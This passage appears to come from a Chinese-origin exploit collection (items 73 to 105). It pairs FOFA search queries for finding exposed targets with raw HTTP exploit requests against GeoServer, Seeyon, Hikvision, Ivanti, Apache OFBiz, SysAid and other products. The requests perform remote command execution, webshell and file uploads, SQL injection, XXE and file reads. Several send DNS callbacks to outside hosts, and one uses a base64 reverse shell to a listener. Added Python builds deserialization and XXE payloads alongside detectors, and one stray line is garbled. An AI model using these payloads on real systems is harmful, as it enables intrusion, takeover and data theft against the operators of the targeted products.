S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 clothing management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Suda Tianyao (速达天耀) software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is shown below; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) Mingyu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity (安恒) Mingyu security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi-Anxin Legendsec (奇安信网神) SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin Legendsec (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify the upload by fetching the file back (the filename is the one sent in the upfile part):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrp remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD
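The last two steps (serialize a gadget chain with ysoserial, base64 it, drop it into the `<serializable>` element) and the matching check a defender would run over an XML-RPC body are written out below. This is an added example, not code from the original post, from Apache OFBiz or from ysoserial; `build_xmlrpc_body` and `find_java_serialized` are names chosen here, and `FAKE_GADGET` is a constructed stand-in for ysoserial output (it carries the Java serialization magic but no real gadget chain).

```python
import base64
import xml.etree.ElementTree as ET

# Namespace of the Apache XML-RPC "extensions" element that carries a Java-serialized value
XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
# Every Java serialization stream starts with STREAM_MAGIC 0xACED and STREAM_VERSION 5
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"


def build_xmlrpc_body(serialized: bytes, method_name: str = "test") -> str:
    """Wrap a serialized Java object in the same XML-RPC envelope as the
    request above. `serialized` is the raw (not yet base64) ysoserial output."""
    b64 = base64.b64encode(serialized).decode("ascii")
    return (
        '<?xml version="1.0"?>\n'
        "<methodCall>\n"
        f"  <methodName>{method_name}</methodName>\n"
        "  <params><param><value><struct><member>\n"
        "    <name>test</name>\n"
        f'    <value><serializable xmlns="{XMLRPC_EXT_NS}">{b64}</serializable></value>\n'
        "  </member></struct></value></param></params>\n"
        "</methodCall>\n"
    )


def find_java_serialized(body: str) -> list:
    """Defender-side check: decode every <serializable> element in an XML-RPC
    body and return those whose content is a Java serialization stream.
    An empty list means the body carries no Java object at all."""
    hits = []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return hits
    for elem in root.iter(f"{{{XMLRPC_EXT_NS}}}serializable"):
        try:
            raw = base64.b64decode(elem.text or "", validate=True)
        except (ValueError, TypeError):
            continue  # not base64 at all; nothing the server could deserialize
        if raw.startswith(JAVA_SERIAL_MAGIC):
            hits.append(raw)
    return hits


# Constructed stand-in for ysoserial output: correct magic, dummy class name, no gadget chain.
FAKE_GADGET = JAVA_SERIAL_MAGIC + b"\x73\x72\x00\x0cnot.a.Gadget"
# Constructed benign value: base64 of plain text is not a Java object.
BENIGN = b"plain text, not a Java object"

if __name__ == "__main__":
    body = build_xmlrpc_body(FAKE_GADGET)
    print(body)
    print("Java objects found:", len(find_java_serialized(body)))
    print("Java objects in benign body:", len(find_java_serialized(build_xmlrpc_body(BENIGN))))
```

Any `<serializable>` value that starts with `AC ED 00 05` is a Java object the XML-RPC layer deserializes while it is still parsing the parameters, before the method is looked up; that is why the `<methodName>` in the request above can be a random string.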

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document (the base64 above encodes a line break and four spaces between SYSTEM and the URI):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

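Building the SAMLRequest parameter from that XML, and the reverse check an IdP-facing endpoint or proxy should make on an incoming one, as an added example that is not part of the original post or of any Ivanti code. `build_saml_request`, `decode_saml_request`, `dtd_external_refs` and `has_doctype` are names chosen here; `XXE_XML` is the page's own document with the whitespace the base64 above actually encodes.

```python
import base64
import re

# The XML behind the SAMLRequest above, with the whitespace the base64 actually encodes
XXE_XML = (
    '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM\n'
    '    "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>'
)

# A DOCTYPE with an internal subset; a SAML message never legitimately carries one
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# External entity or parameter-entity declaration with a SYSTEM/PUBLIC URI
_EXTERNAL_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s*"([^"]*)"',
    re.IGNORECASE,
)


def build_saml_request(xml: str) -> str:
    """POST-binding SAMLRequest is simply the base64 of the XML document."""
    return base64.b64encode(xml.encode("utf-8")).decode("ascii")


def decode_saml_request(param: str) -> bytes:
    """Decode a SAMLRequest form value. The Redirect binding would additionally
    DEFLATE the XML; the request above uses the plain POST form."""
    return base64.b64decode(param)


def has_doctype(xml: bytes) -> bool:
    """True if the document declares a DTD at all; reject such SAML messages outright."""
    return bool(_DOCTYPE_RE.search(xml.decode("utf-8", errors="replace")))


def dtd_external_refs(xml: bytes) -> list:
    """Every URI referenced by an external (parameter) entity in the DTD.
    A non-empty list from a SAML endpoint is an XXE attempt and tells you
    where the parser would have connected (the out-of-band callback host)."""
    text = xml.decode("utf-8", errors="replace")
    if not _DOCTYPE_RE.search(text):
        return []
    return [m.group(2) for m in _EXTERNAL_RE.finditer(text)]


if __name__ == "__main__":
    param = build_saml_request(XXE_XML)
    print("SAMLRequest=" + param)
    print("external refs:", dtd_external_refs(decode_saml_request(param)))
```

The check is deliberately done on the raw bytes before any XML parser sees them: the whole point of the vulnerability is that the parser resolves the external entity while parsing, so a parser-based check would already have made the request.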
" C2 \, s* J8 t# k0 j+ q# B+ q6 n0 S0 w" L+ d2 t
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1


